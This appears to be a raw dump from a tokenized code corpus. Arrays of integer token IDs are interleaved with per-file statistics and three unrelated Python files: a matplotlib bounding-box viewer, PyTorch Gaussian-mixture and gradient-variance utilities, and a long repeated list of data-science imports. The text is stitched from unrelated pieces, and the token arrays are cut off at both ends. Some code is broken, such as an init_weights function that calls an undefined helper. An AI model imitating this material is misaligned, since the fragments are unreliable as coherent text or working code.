12, 24, 13, 36, 60, 9, 41441, 9, 59, 67, 28104, 58, 10, 12, 60, 9, 15885, 30, 43054, 4943, 220, 1303, 5525, 123, 247, 42468, 37605, 241, 26344, 251, 10310, 118, 165, 240, 253, 163, 223, 123, 37863, 247, 21410, 29826, 96, 26344, 247, 171, 120, 234, 22755, 239, 163, 236, 108, 28839, 101, 20046, 253, 40367, 233, 38834, 13783, 103, 162, 229, 224, 12859, 228, 16764, 198, 220, 220, 220, 1231, 62, 439, 62, 37266, 796, 17635, 198, 220, 220, 220, 3601, 7203, 163, 236, 108, 28839, 101, 33699, 100, 26193, 234, 162, 249, 123, 162, 235, 95, 17739, 101, 32849, 101, 12740, 43, 20998, 224, 46763, 108, 21410, 49035, 121, 46763, 108, 17174, 17174, 8412, 2466, 1174, 4943, 198, 220, 220, 220, 3601, 7203, 33699, 222, 17312, 231, 21410, 28938, 104, 20046, 231, 20998, 224, 46763, 108, 21410, 26193, 234, 37863, 227, 22522, 117, 36685, 224, 10310, 233, 17174, 17174, 8412, 4557, 9, 4943, 198, 220, 220, 220, 329, 1627, 287, 616, 7890, 25, 198, 220, 220, 220, 220, 220, 220, 220, 611, 3912, 13, 12947, 7, 1370, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 7, 1370, 8, 198, 220, 220, 220, 1303, 220, 220, 220, 220, 3601, 7, 33279, 13, 7266, 7, 81, 6, 59, 16, 3256, 1627, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 1627, 796, 3912, 13, 7266, 7, 81, 6, 59, 16, 3256, 1627, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1231, 62, 439, 62, 37266, 13, 33295, 7, 1370, 8, 198, 220, 220, 220, 1303, 19419, 62, 439, 62, 37266, 796, 1231, 62, 439, 62, 37266, 58, 21912, 16, 60, 220, 220, 1303, 10263, 236, 119, 162, 236, 231, 17312, 222, 28938, 236, 31660, 10310, 103, 764, 2412, 300, 85, 77, 368, 418, 19, 62, 16, 79, 17, 62, 6780, 79, 86, 198, 220, 220, 220, 3601, 7203, 17174, 17174, 17174, 8412, 2466, 4943, 198, 220, 220, 220, 1441, 1231, 62, 439, 62, 37266, 628, 198, 2, 554, 58, 1415, 5974, 628, 198, 198, 2, 554, 58, 1314, 5974, 628, 198, 7804, 21017, 13783, 226, 49426, 228, 40347, 21410, 32849, 101, 26344, 228, 29113, 29113, 7804, 2, 198, 10215, 1008, 62, 17143, 62, 11600, 796, 651, 62, 11600, 62, 1659, 62, 8019, 7, 40347, 62, 46700, 1677, 10067, 8, 198, 29762, 62, 1712, 2981, 62, 10215, 1008, 62, 17143, 62, 11600, 796, 651, 62, 11600, 62, 1659, 62, 29762, 62, 1712, 2981, 62, 11600, 62, 1659, 62, 8019, 7, 10215, 1008, 62, 17143, 62, 11600, 8, 198, 20311, 62, 8019, 62, 3911, 796, 651, 62, 20311, 62, 8019, 62, 3911, 7, 44, 2640, 20608, 11, 2060, 62, 1712, 2981, 62, 10215, 1008, 62, 17143, 62, 11600, 8, 198, 7804, 21017, 13783, 226, 49426, 228, 12740, 43, 21410, 32849, 101, 26344, 228, 29113, 29113, 4242, 198, 1831, 62, 9132, 75, 796, 651, 62, 27190, 62, 36311, 276, 62, 9132, 75, 7, 12740, 43, 62, 46700, 1677, 10067, 11, 44, 2640, 20608, 8, 198, 25413, 62, 2375, 22739, 62, 9132, 75, 796, 651, 62, 25413, 62, 2375, 22739, 62, 9132, 75, 7, 1831, 62, 9132, 75, 8, 198, 12993, 62, 2375, 22739, 62, 9132, 75, 796, 651, 62, 12993, 62, 2375, 22739, 62, 9132, 75, 7, 25413, 62, 2375, 22739, 62, 9132, 75, 8, 198, 439, 37266, 62, 2375, 22739, 62, 9132, 75, 796, 651, 62, 439, 37266, 62, 2375, 22739, 62, 9132, 75, 7, 12993, 62, 2375, 22739, 62, 9132, 75, 8, 198, 29113, 29113, 14468, 7804, 4242, 198, 20311, 62, 8019, 796, 651, 62, 20311, 62, 8019, 7, 20311, 62, 8019, 62, 3911, 11, 30218, 62, 2375, 22739, 62, 9132, 75, 8, 198, 198, 8019, 34345, 796, 337, 2640, 20608, 1343, 45302, 8019, 62, 13965, 6, 198, 4426, 34345, 796, 337, 2640, 20608, 1343, 45302, 4426, 62, 13965, 6, 198, 198, 4480, 1280, 7, 8019, 34345, 11, 4235, 11639, 86, 11537, 355, 277, 25, 198, 220, 220, 220, 329, 1627, 287, 2457, 62, 8019, 25, 198, 220, 220, 220, 220, 220, 220, 220, 277, 13, 8933, 20655, 7, 1370, 8, 198, 4480, 1280, 7, 4426, 34345, 11, 4235, 11639, 86, 11537, 355, 277, 25, 198, 220, 220, 220, 329, 1627, 287, 477, 37266, 62, 2375, 22739, 62, 9132, 75, 25, 198, 220, 220, 220, 220, 220, 220, 220, 277, 13, 8933, 20655, 7, 1370, 8, 198, 198, 15414, 7203, 164, 122, 241, 17739, 98, 20015, 119, 35707, 237, 165, 242, 106, 34460, 222, 49035, 118, 171, 120, 223, 4943, 628 ]
1.979203
5,722
#!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import print_function import os import sys import matplotlib.pyplot as plt from matplotlib.patches import Rectangle import warnings warnings.filterwarnings("ignore") try: dataset = sys.argv[1] data_dir = os.path.join('data', dataset) except Exception as e: print("Usage: python3 %s <directory name>" % sys.argv[0]) sys.exit(0) DATA_FILE_PATH = os.path.join(data_dir, 'data.csv') IMG_DIR = os.path.join(data_dir, 'JPEGImages') ax = plt.gca() with open(DATA_FILE_PATH, 'r') as data_file: lines = data_file.readlines() headers = lines[0].strip().split(',') for line in lines[1:]: chunks = line.strip().split(',') label_name = '' bbox_str = '' for i, chunk in enumerate(chunks): if (i != 0 and chunk != '-'): label_name = headers[i] bbox_str = chunk bbox_strs = chunk.split(' ') x1 = float(bbox_strs[0]) y1 = float(bbox_strs[1]) width = float(bbox_strs[2]) - x1 height = float(bbox_strs[3]) - y1 break img = plt.imread(os.path.join(IMG_DIR, chunks[0])) print("[%s] [%d*%d] [%s] [%s]" % (chunks[0], img.shape[1], img.shape[0], label_name, bbox_str), end='') sys.stdout.flush() plt.imshow(img) rect = Rectangle((x1, y1), width, height) rect.set_edgecolor('yellow') rect.set_facecolor('none') ax.add_patch(rect) plt.pause(0.001) input("") rect.remove()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 28686, 198, 11748, 25064, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 6738, 2603, 29487, 8019, 13, 8071, 2052, 1330, 48599, 9248, 198, 11748, 14601, 198, 40539, 654, 13, 24455, 40539, 654, 7203, 46430, 4943, 198, 198, 28311, 25, 198, 220, 220, 220, 27039, 796, 25064, 13, 853, 85, 58, 16, 60, 198, 220, 220, 220, 1366, 62, 15908, 796, 28686, 13, 6978, 13, 22179, 10786, 7890, 3256, 27039, 8, 198, 16341, 35528, 355, 304, 25, 198, 220, 220, 220, 3601, 7203, 28350, 25, 21015, 18, 4064, 82, 1279, 34945, 1438, 24618, 4064, 25064, 13, 853, 85, 58, 15, 12962, 198, 220, 220, 220, 25064, 13, 37023, 7, 15, 8, 198, 198, 26947, 62, 25664, 62, 34219, 796, 28686, 13, 6978, 13, 22179, 7, 7890, 62, 15908, 11, 705, 7890, 13, 40664, 11537, 198, 3955, 38, 62, 34720, 796, 28686, 13, 6978, 13, 22179, 7, 7890, 62, 15908, 11, 705, 12889, 7156, 29398, 11537, 198, 198, 897, 796, 458, 83, 13, 70, 6888, 3419, 198, 198, 4480, 1280, 7, 26947, 62, 25664, 62, 34219, 11, 705, 81, 11537, 355, 1366, 62, 7753, 25, 198, 220, 220, 220, 3951, 796, 1366, 62, 7753, 13, 961, 6615, 3419, 198, 50145, 796, 3951, 58, 15, 4083, 36311, 22446, 35312, 7, 3256, 11537, 198, 1640, 1627, 287, 3951, 58, 16, 25, 5974, 198, 220, 220, 220, 22716, 796, 1627, 13, 36311, 22446, 35312, 7, 3256, 11537, 198, 220, 220, 220, 6167, 62, 3672, 796, 10148, 198, 220, 220, 220, 275, 3524, 62, 2536, 796, 10148, 198, 220, 220, 220, 329, 1312, 11, 16058, 287, 27056, 378, 7, 354, 14125, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 611, 357, 72, 14512, 657, 290, 16058, 14512, 705, 19355, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6167, 62, 3672, 796, 24697, 58, 72, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 275, 3524, 62, 2536, 796, 16058, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 275, 3524, 62, 2536, 82, 796, 16058, 13, 35312, 10786, 705, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 16, 796, 12178, 7, 65, 3524, 62, 2536, 82, 58, 15, 12962, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 331, 16, 796, 12178, 7, 65, 3524, 62, 2536, 82, 58, 16, 12962, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9647, 796, 12178, 7, 65, 3524, 62, 2536, 82, 58, 17, 12962, 532, 2124, 16, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6001, 796, 12178, 7, 65, 3524, 62, 2536, 82, 58, 18, 12962, 532, 331, 16, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2270, 198, 220, 220, 220, 33705, 796, 458, 83, 13, 320, 961, 7, 418, 13, 6978, 13, 22179, 7, 3955, 38, 62, 34720, 11, 22716, 58, 15, 60, 4008, 198, 220, 220, 220, 3601, 7203, 58, 4, 82, 60, 685, 4, 67, 9, 4, 67, 60, 685, 4, 82, 60, 685, 4, 82, 30866, 4064, 357, 354, 14125, 58, 15, 4357, 33705, 13, 43358, 58, 16, 4357, 33705, 13, 43358, 58, 15, 4357, 6167, 62, 3672, 11, 275, 3524, 62, 2536, 828, 886, 28, 7061, 8, 198, 220, 220, 220, 25064, 13, 19282, 448, 13, 25925, 3419, 198, 220, 220, 220, 458, 83, 13, 320, 12860, 7, 9600, 8, 198, 220, 220, 220, 13621, 796, 48599, 9248, 19510, 87, 16, 11, 331, 16, 828, 9647, 11, 6001, 8, 198, 220, 220, 220, 13621, 13, 2617, 62, 14907, 8043, 10786, 36022, 11537, 198, 220, 220, 220, 13621, 13, 2617, 62, 2550, 8043, 10786, 23108, 11537, 198, 220, 220, 220, 7877, 13, 2860, 62, 17147, 7, 2554, 8, 198, 220, 220, 220, 458, 83, 13, 32125, 7, 15, 13, 8298, 8, 198, 220, 220, 220, 5128, 7203, 4943, 198, 220, 220, 220, 13621, 13, 28956, 3419, 198 ]
2.149211
697
import torch import torch.nn.functional as F from torch.nn import init import numpy as np from scipy.stats import truncnorm def init_weights(net, init_type='normal', init_gain=0.02): """Initialize network weights. Modified from: https://github.com/baudm/MONet-pytorch/blob/master/models/networks.py Parameters: net (network) -- network to be initialized init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal init_gain (float) -- scaling factor for normal, xavier and orthogonal. We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might work better for some applications. Feel free to try yourself. """ net.apply(init_func) def gmm_loglikelihood(x_t, x_loc, log_var, mask_logprobs): """ mask_logprobs: [N, K, 1, H, W] """ # NLL [batch_size, 1, H, W] sq_err = (x_t.unsqueeze(1) - x_loc).pow(2) # log N(x; x_loc, log_var): [N, K, C, H, W] normal_ll = -0.5 * log_var - 0.5 * (sq_err / torch.exp(log_var)) # [N, K, C, H, W] log_p_k = (mask_logprobs + normal_ll) # logsumexp over slots [N, C, H, W] log_p = torch.logsumexp(log_p_k, dim=1) # [batch_size] nll = -torch.sum(log_p, dim=[1,2,3]) #upper_bound = torch.logsumexp(mask_logprobs - 0.5 * (sq_err / torch.exp(log_var)), dim=1) # [N, C, H, W] #upper_bound = torch.sum(upper_bound, dim=[1,2,3]) # [N] return nll, {'log_p_k': log_p_k, 'normal_ll': normal_ll, 'ub': None} def get_log_var_grad(val_dataloader, model, geco, seq_len, aggregate_over=20): """ assume batch_size is 1, compu """ opt = torch.optim.SGD(model.parameters(), lr=1) model.train() num_grads = 0 for p in model.module.relational_dynamics.parameters(): if p.requires_grad: num_grads += 1 grads = [[] for i in range(num_grads)] logvargrads = [[] for i in range(num_grads)] for i,batch in enumerate(val_dataloader): imgs = batch['imgs'].to('cuda') imgs = imgs[:,:seq_len] model_outs = model(imgs, geco, i, None) opt.zero_grad() total_loss = model_outs['total_loss'] # [1] for sample size 1 total_loss.backward() torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=5.) # for each parameter, flatten and store j = 0 for p in model.module.relational_dynamics.parameters(): if p.requires_grad: grads[j] += [p.grad.view(-1)] j += 1 if len(grads[0]) == aggregate_over: print('aggregating at {}'.format(i)) for j,g in enumerate(grads): all_grad = torch.stack(g).data.cpu().numpy() # [aggregate, dim] logvargrads[j] += [np.mean(np.log(np.var(all_grad, 1)+1e-6))] # reset grads = [[] for i in range(num_grads)] lvg_ = 0 for lvg in logvargrads: lvg_ += np.mean(lvg) lvg_ = lvg_ / len(logvargrads) return lvg_
[ 11748, 28034, 198, 11748, 28034, 13, 20471, 13, 45124, 355, 376, 198, 6738, 28034, 13, 20471, 1330, 2315, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 629, 541, 88, 13, 34242, 1330, 40122, 27237, 628, 198, 4299, 2315, 62, 43775, 7, 3262, 11, 2315, 62, 4906, 11639, 11265, 3256, 2315, 62, 48544, 28, 15, 13, 2999, 2599, 198, 220, 220, 220, 37227, 24243, 1096, 3127, 19590, 13, 628, 220, 220, 220, 40499, 422, 25, 3740, 1378, 12567, 13, 785, 14, 65, 3885, 76, 14, 27857, 316, 12, 9078, 13165, 354, 14, 2436, 672, 14, 9866, 14, 27530, 14, 3262, 5225, 13, 9078, 628, 220, 220, 220, 40117, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2010, 357, 27349, 8, 220, 220, 1377, 3127, 284, 307, 23224, 198, 220, 220, 220, 220, 220, 220, 220, 2315, 62, 4906, 357, 2536, 8, 1377, 262, 1438, 286, 281, 37588, 2446, 25, 3487, 930, 2124, 19492, 930, 479, 1385, 278, 930, 29617, 519, 20996, 198, 220, 220, 220, 220, 220, 220, 220, 2315, 62, 48544, 357, 22468, 8, 220, 220, 220, 1377, 20796, 5766, 329, 3487, 11, 2124, 19492, 290, 29617, 519, 20996, 13, 628, 220, 220, 220, 775, 779, 705, 11265, 6, 287, 262, 2656, 279, 844, 17, 79, 844, 290, 26993, 45028, 3348, 13, 887, 2124, 19492, 290, 479, 1385, 278, 1244, 198, 220, 220, 220, 670, 1365, 329, 617, 5479, 13, 18571, 1479, 284, 1949, 3511, 13, 198, 220, 220, 220, 37227, 628, 220, 220, 220, 2010, 13, 39014, 7, 15003, 62, 20786, 8, 628, 198, 198, 4299, 308, 3020, 62, 6404, 2339, 11935, 7, 87, 62, 83, 11, 2124, 62, 17946, 11, 2604, 62, 7785, 11, 9335, 62, 6404, 1676, 1443, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 9335, 62, 6404, 1676, 1443, 25, 685, 45, 11, 509, 11, 352, 11, 367, 11, 370, 60, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 1303, 399, 3069, 685, 43501, 62, 7857, 11, 352, 11, 367, 11, 370, 60, 198, 220, 220, 220, 19862, 62, 8056, 796, 357, 87, 62, 83, 13, 13271, 421, 1453, 2736, 7, 16, 8, 532, 2124, 62, 17946, 737, 79, 322, 7, 17, 8, 198, 220, 220, 220, 1303, 2604, 399, 7, 87, 26, 2124, 62, 17946, 11, 2604, 62, 7785, 2599, 685, 45, 11, 509, 11, 327, 11, 367, 11, 370, 60, 198, 220, 220, 220, 3487, 62, 297, 796, 532, 15, 13, 20, 1635, 2604, 62, 7785, 532, 657, 13, 20, 1635, 357, 31166, 62, 8056, 1220, 28034, 13, 11201, 7, 6404, 62, 7785, 4008, 198, 220, 220, 220, 1303, 685, 45, 11, 509, 11, 327, 11, 367, 11, 370, 60, 198, 220, 220, 220, 2604, 62, 79, 62, 74, 796, 357, 27932, 62, 6404, 1676, 1443, 1343, 3487, 62, 297, 8, 198, 220, 220, 220, 1303, 2604, 16345, 11201, 625, 17314, 685, 45, 11, 327, 11, 367, 11, 370, 60, 198, 220, 220, 220, 2604, 62, 79, 796, 28034, 13, 6404, 16345, 11201, 7, 6404, 62, 79, 62, 74, 11, 5391, 28, 16, 8, 198, 220, 220, 220, 1303, 685, 43501, 62, 7857, 60, 198, 220, 220, 220, 299, 297, 796, 532, 13165, 354, 13, 16345, 7, 6404, 62, 79, 11, 5391, 41888, 16, 11, 17, 11, 18, 12962, 628, 220, 220, 220, 1303, 45828, 62, 7784, 796, 28034, 13, 6404, 16345, 11201, 7, 27932, 62, 6404, 1676, 1443, 532, 657, 13, 20, 1635, 357, 31166, 62, 8056, 1220, 28034, 13, 11201, 7, 6404, 62, 7785, 36911, 5391, 28, 16, 8, 220, 1303, 685, 45, 11, 327, 11, 367, 11, 370, 60, 198, 220, 220, 220, 1303, 45828, 62, 7784, 796, 28034, 13, 16345, 7, 45828, 62, 7784, 11, 5391, 41888, 16, 11, 17, 11, 18, 12962, 220, 1303, 685, 45, 60, 628, 220, 220, 220, 1441, 299, 297, 11, 1391, 6, 6404, 62, 79, 62, 74, 10354, 2604, 62, 79, 62, 74, 11, 705, 11265, 62, 297, 10354, 3487, 62, 297, 11, 705, 549, 10354, 6045, 92, 628, 198, 4299, 651, 62, 6404, 62, 7785, 62, 9744, 7, 2100, 62, 67, 10254, 1170, 263, 11, 2746, 11, 308, 47704, 11, 33756, 62, 11925, 11, 19406, 62, 2502, 28, 1238, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 7048, 15458, 62, 7857, 318, 352, 11, 552, 84, 220, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 2172, 796, 28034, 13, 40085, 13, 38475, 35, 7, 19849, 13, 17143, 7307, 22784, 300, 81, 28, 16, 8, 198, 220, 220, 220, 2746, 13, 27432, 3419, 628, 220, 220, 220, 997, 62, 2164, 5643, 796, 657, 198, 220, 220, 220, 329, 279, 287, 2746, 13, 21412, 13, 2411, 864, 62, 67, 4989, 873, 13, 17143, 7307, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 611, 279, 13, 47911, 62, 9744, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 997, 62, 2164, 5643, 15853, 352, 628, 220, 220, 220, 3915, 82, 796, 16410, 60, 329, 1312, 287, 2837, 7, 22510, 62, 2164, 5643, 15437, 198, 220, 220, 220, 2604, 85, 853, 81, 5643, 796, 16410, 60, 329, 1312, 287, 2837, 7, 22510, 62, 2164, 5643, 15437, 628, 220, 220, 220, 329, 1312, 11, 43501, 287, 27056, 378, 7, 2100, 62, 67, 10254, 1170, 263, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 545, 14542, 796, 15458, 17816, 9600, 82, 6, 4083, 1462, 10786, 66, 15339, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 545, 14542, 796, 545, 14542, 58, 45299, 25, 41068, 62, 11925, 60, 628, 220, 220, 220, 220, 220, 220, 220, 2746, 62, 5269, 796, 2746, 7, 9600, 82, 11, 308, 47704, 11, 1312, 11, 6045, 8, 628, 220, 220, 220, 220, 220, 220, 220, 2172, 13, 22570, 62, 9744, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 2472, 62, 22462, 796, 2746, 62, 5269, 17816, 23350, 62, 22462, 20520, 220, 1303, 685, 16, 60, 329, 6291, 2546, 352, 198, 220, 220, 220, 220, 220, 220, 220, 2472, 62, 22462, 13, 1891, 904, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 28034, 13, 20471, 13, 26791, 13, 15036, 62, 9744, 62, 27237, 41052, 19849, 13, 17143, 7307, 22784, 3509, 62, 27237, 28, 20, 2014, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 329, 1123, 11507, 11, 27172, 268, 290, 3650, 198, 220, 220, 220, 220, 220, 220, 220, 474, 796, 657, 198, 220, 220, 220, 220, 220, 220, 220, 329, 279, 287, 2746, 13, 21412, 13, 2411, 864, 62, 67, 4989, 873, 13, 17143, 7307, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 279, 13, 47911, 62, 9744, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3915, 82, 58, 73, 60, 15853, 685, 79, 13, 9744, 13, 1177, 32590, 16, 15437, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 474, 15853, 352, 628, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 2164, 5643, 58, 15, 12962, 6624, 19406, 62, 2502, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 9460, 2301, 803, 379, 23884, 4458, 18982, 7, 72, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 474, 11, 70, 287, 27056, 378, 7, 2164, 5643, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 477, 62, 9744, 796, 28034, 13, 25558, 7, 70, 737, 7890, 13, 36166, 22446, 77, 32152, 3419, 220, 1303, 685, 9460, 49373, 11, 5391, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2604, 85, 853, 81, 5643, 58, 73, 60, 15853, 685, 37659, 13, 32604, 7, 37659, 13, 6404, 7, 37659, 13, 7785, 7, 439, 62, 9744, 11, 352, 47762, 16, 68, 12, 21, 4008, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 13259, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3915, 82, 796, 16410, 60, 329, 1312, 287, 2837, 7, 22510, 62, 2164, 5643, 15437, 628, 220, 220, 220, 300, 45119, 62, 796, 657, 198, 220, 220, 220, 329, 300, 45119, 287, 2604, 85, 853, 81, 5643, 25, 198, 220, 220, 220, 220, 220, 220, 220, 300, 45119, 62, 15853, 45941, 13, 32604, 7, 6780, 70, 8, 198, 220, 220, 220, 300, 45119, 62, 796, 300, 45119, 62, 1220, 18896, 7, 6404, 85, 853, 81, 5643, 8, 198, 220, 220, 220, 1441, 300, 45119, 62, 198 ]
2.13883
1,419
import numpy as np # linear algebra import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) from stockstats import StockDataFrame import warnings import traceback warnings.filterwarnings('ignore') import argparse import re import sys, os sys.path.append(os.getcwd()) import os import requests from requests.exceptions import ConnectionError import bs4 from bs4 import BeautifulSoup from fastnumbers import isfloat from fastnumbers import fast_float from multiprocessing.dummy import Pool as ThreadPool import more_itertools from random import shuffle import matplotlib.pyplot as plt import seaborn as sns from datetime import datetime import json import seaborn as sns sns.set_style('whitegrid') import numpy as np # linear algebra import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) import matplotlib as mplt import matplotlib.pyplot as plt from sklearn.model_selection import train_test_split from sklearn.metrics import mean_squared_error from sklearn.ensemble import RandomForestRegressor from sklearn.metrics import explained_variance_score from sklearn.preprocessing import LabelEncoder from sklearn.metrics import confusion_matrix from sklearn.model_selection import GridSearchCV import matplotlib.dates as mdates import seaborn as sns import math import gc import ipaddress from urllib.parse import urlparse from sklearn.metrics import confusion_matrix from sklearn.preprocessing import StandardScaler from sklearn.neural_network import MLPClassifier from data_science_utils import dataframe as df_utils from data_science_utils import models as model_utils from data_science_utils.dataframe import column as column_utils from data_science_utils.models.IdentityScaler import IdentityScaler as IdentityScaler from xgboost import XGBClassifier from sklearn.model_selection import train_test_split from sklearn.metrics import accuracy_score from sklearn.metrics import confusion_matrix,classification_report import lightgbm as lgb np.set_printoptions(threshold=np.nan) import pickle from xgboost import XGBClassifier import xgboost as xgb from sklearn.metrics import accuracy_score import missingno as msno from sklearn.metrics import f1_score from sklearn.metrics import precision_score from sklearn.metrics import recall_score from sklearn.preprocessing import StandardScaler import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D from sklearn import datasets from sklearn.decomposition import PCA import datetime from scipy import signal import matplotlib.pyplot as plt from datetime import timedelta from sklearn import linear_model from sklearn.metrics import roc_auc_score from IPython.display import display, HTML import warnings warnings.filterwarnings('ignore') from data_science_utils.misc import ffloat from data_science_utils.misc import is_dataframe from data_science_utils.misc import ffloat_list from data_science_utils.misc import remove_multiple_spaces from datetime import date, timedelta
[ 11748, 299, 32152, 355, 45941, 1303, 14174, 37139, 198, 11748, 19798, 292, 355, 279, 67, 1303, 1366, 7587, 11, 44189, 2393, 314, 14, 46, 357, 68, 13, 70, 13, 279, 67, 13, 961, 62, 40664, 8, 198, 6738, 4283, 34242, 1330, 10500, 6601, 19778, 198, 198, 11748, 14601, 198, 11748, 12854, 1891, 198, 198, 40539, 654, 13, 24455, 40539, 654, 10786, 46430, 11537, 198, 11748, 1822, 29572, 198, 11748, 302, 198, 11748, 25064, 11, 28686, 198, 198, 17597, 13, 6978, 13, 33295, 7, 418, 13, 1136, 66, 16993, 28955, 198, 198, 11748, 28686, 198, 11748, 7007, 198, 6738, 7007, 13, 1069, 11755, 1330, 26923, 12331, 198, 198, 11748, 275, 82, 19, 198, 6738, 275, 82, 19, 1330, 23762, 50, 10486, 198, 6738, 3049, 77, 17024, 1330, 318, 22468, 198, 6738, 3049, 77, 17024, 1330, 3049, 62, 22468, 198, 6738, 18540, 305, 919, 278, 13, 67, 13513, 1330, 19850, 355, 14122, 27201, 198, 11748, 517, 62, 270, 861, 10141, 198, 6738, 4738, 1330, 36273, 198, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 384, 397, 1211, 355, 3013, 82, 198, 6738, 4818, 8079, 1330, 4818, 8079, 198, 11748, 33918, 198, 198, 11748, 384, 397, 1211, 355, 3013, 82, 198, 82, 5907, 13, 2617, 62, 7635, 10786, 11186, 25928, 11537, 198, 198, 11748, 299, 32152, 355, 45941, 1303, 14174, 37139, 198, 11748, 19798, 292, 355, 279, 67, 1303, 1366, 7587, 11, 44189, 2393, 314, 14, 46, 357, 68, 13, 70, 13, 279, 67, 13, 961, 62, 40664, 8, 198, 11748, 2603, 29487, 8019, 355, 285, 489, 83, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 6738, 1341, 35720, 13, 19849, 62, 49283, 1330, 4512, 62, 9288, 62, 35312, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 1612, 62, 16485, 1144, 62, 18224, 198, 6738, 1341, 35720, 13, 1072, 11306, 1330, 14534, 34605, 8081, 44292, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 4893, 62, 25641, 590, 62, 26675, 198, 6738, 1341, 35720, 13, 3866, 36948, 1330, 36052, 27195, 12342, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 10802, 62, 6759, 8609, 198, 6738, 1341, 35720, 13, 19849, 62, 49283, 1330, 24846, 18243, 33538, 198, 11748, 2603, 29487, 8019, 13, 19581, 355, 285, 19581, 198, 11748, 384, 397, 1211, 355, 3013, 82, 198, 11748, 10688, 198, 11748, 308, 66, 198, 11748, 20966, 21975, 198, 6738, 2956, 297, 571, 13, 29572, 1330, 19016, 29572, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 10802, 62, 6759, 8609, 198, 6738, 1341, 35720, 13, 3866, 36948, 1330, 8997, 3351, 36213, 198, 6738, 1341, 35720, 13, 710, 1523, 62, 27349, 1330, 10373, 47, 9487, 7483, 198, 198, 6738, 1366, 62, 16801, 62, 26791, 1330, 1366, 14535, 355, 47764, 62, 26791, 198, 6738, 1366, 62, 16801, 62, 26791, 1330, 4981, 355, 2746, 62, 26791, 198, 6738, 1366, 62, 16801, 62, 26791, 13, 7890, 14535, 1330, 5721, 355, 5721, 62, 26791, 198, 6738, 1366, 62, 16801, 62, 26791, 13, 27530, 13, 7390, 26858, 3351, 36213, 1330, 27207, 3351, 36213, 355, 27207, 3351, 36213, 628, 198, 6738, 2124, 70, 39521, 1330, 1395, 4579, 9487, 7483, 198, 6738, 1341, 35720, 13, 19849, 62, 49283, 1330, 4512, 62, 9288, 62, 35312, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 9922, 62, 26675, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 10802, 62, 6759, 8609, 11, 4871, 2649, 62, 13116, 198, 198, 11748, 1657, 70, 20475, 355, 300, 22296, 198, 198, 37659, 13, 2617, 62, 4798, 25811, 7, 400, 10126, 28, 37659, 13, 12647, 8, 198, 11748, 2298, 293, 628, 198, 6738, 2124, 70, 39521, 1330, 1395, 4579, 9487, 7483, 198, 11748, 2124, 70, 39521, 355, 2124, 22296, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 9922, 62, 26675, 198, 11748, 4814, 3919, 355, 13845, 3919, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 277, 16, 62, 26675, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 15440, 62, 26675, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 10014, 62, 26675, 198, 6738, 1341, 35720, 13, 3866, 36948, 1330, 8997, 3351, 36213, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 6738, 285, 489, 62, 